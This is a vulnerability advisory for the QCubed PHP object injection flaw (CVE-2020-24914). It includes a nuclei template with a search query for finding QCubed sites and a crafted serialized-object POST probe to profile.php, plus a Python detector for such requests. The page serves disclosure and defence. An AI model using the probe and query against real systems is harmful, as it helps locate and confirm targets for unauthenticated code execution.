QCubed PHP Object Injection Vulnerability

Vulnerability Information

Vulnerability name: QCubed PHP Object Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2020-24914

Vulnerability type: Deserialization

Severity: Critical

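Description: QCubed is a PHP framework for rapid development of web applications. It is widely used in web development projects and provides a rich component library and tooling to support efficient development. Typical deployments include enterprise services and common web application components. Because it is so widely used, the framework's security is critical to many projects.

This is a deserialization vulnerability. Its technical root cause is that profile.php in the QCubed framework deserializes untrusted POST data. By sending a crafted POST request, an attacker can exploit this to achieve PHP object injection and, in turn, execute arbitrary code. Exploitation requires no authentication and can be carried out remotely, with serious impact on the system.

The impact is extremely severe because it allows an unauthenticated attacker to execute arbitrary code remotely, which can lead to full server compromise, data disclosure, service disruption and other serious consequences. Because the exploitation conditions are simple and no user interaction is required, it can be widely exploited by automated tools, posing a major security threat to web applications built on the QCubed framework.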

Vendor: QCubed

Product: QCubed

Affected versions: 3.1.1 and all versions

Search query: title="QCubed" || body="qcubed"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/824698f0d3eee3620f587a0b400253d11106ffc6/http%2Fvulnerabilities%2Fphp%2Fqcubed-php-object-injection.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details


id: qcubed-php-object-injection

info:
  name: QCubed PHP Object Injection (CVE-2020-24914)
  author: pranjal
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection caused by unserializing untrusted POST data in profile.php,
    letting unauthenticated attackers execute arbitrary code via crafted POST requests.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24914
    - http://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-01
  classification:
    cwe-id: CWE-502
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 2
    product: QCubed
    fofa-query: title="QCubed" || body="qcubed"
  tags: cve,cve2020,qcubed,php,object-injection,rce,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "qcubed") || contains(tolower(body), "qform")'
        condition: and
        internal: true

  - raw:
      - |
        POST /profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        data=O:8:"stdClass":1:{s:4:"test";s:10:"{{randstr}}";}&action=save&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "stdClass"
          - "{{randstr}}"

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - 'contains(body, "stdClass")'
          - 'contains(body, "{{randstr}}")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'O:8:"stdClass":1:\{s:4:"test";s:\d+:"[^"]+";\}'
        internal: true
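
For defenders, the request shape the template sends (a form-encoded POST to profile.php whose parameter value is a PHP serialized object) can be flagged in proxy or WAF request logs. The following is an added example, not part of the nuclei template or the QCubed project; the function names and the sample body are constructed for illustration, and it assumes the raw form-encoded body is available to the log pipeline. It goes slightly beyond the template's literal probe by also catching objects nested inside arrays and base64-wrapped values.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

# PHP serialize() object tokens: O:<len>:"Class":<count>:{ and C:<len>:"Class":<len>:{
# at the start of a value or nested after ';' or '{' (for example inside an array).
OBJECT_TOKEN = re.compile(r'(?:^|[;{])[OC]:\+?\d+:"([A-Za-z_\\][\w\\]*)":\d+:\{')

# Constructed sample: same shape as the template's probe body, fixed 10-character marker.
SAMPLE_BODY = 'data=O:8:"stdClass":1:{s:4:"test";s:10:"AAAAAAAAAA";}&action=save&id=1'


def _maybe_base64(value):
    """Return the decoded text if value is strictly valid base64, else None."""
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        return base64.b64decode(value, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def serialized_classes(value):
    """Class names of PHP serialized objects found in one parameter value."""
    candidates = [value]
    decoded = _maybe_base64(value)
    if decoded is not None:
        candidates.append(decoded)
    found = []
    for text in candidates:
        found.extend(OBJECT_TOKEN.findall(text))
    return found


def inspect_request(method, path, body):
    """Return [(param, class_name), ...] for POSTs to profile.php that carry objects."""
    if method.upper() != "POST":
        return []
    if not path.split("?")[0].lower().endswith("/profile.php"):
        return []
    hits = []
    # parse_qsl URL-decodes each value, so percent-encoded payloads are covered too.
    for name, value in parse_qsl(body, keep_blank_values=True, separator="&"):
        hits.extend((name, cls) for cls in serialized_classes(value))
    return hits


if __name__ == "__main__":
    print(inspect_request("POST", "/profile.php", SAMPLE_BODY))
```

A non-empty result is a reason to review the request and the host's QCubed deployment; an empty result does not prove a request was benign.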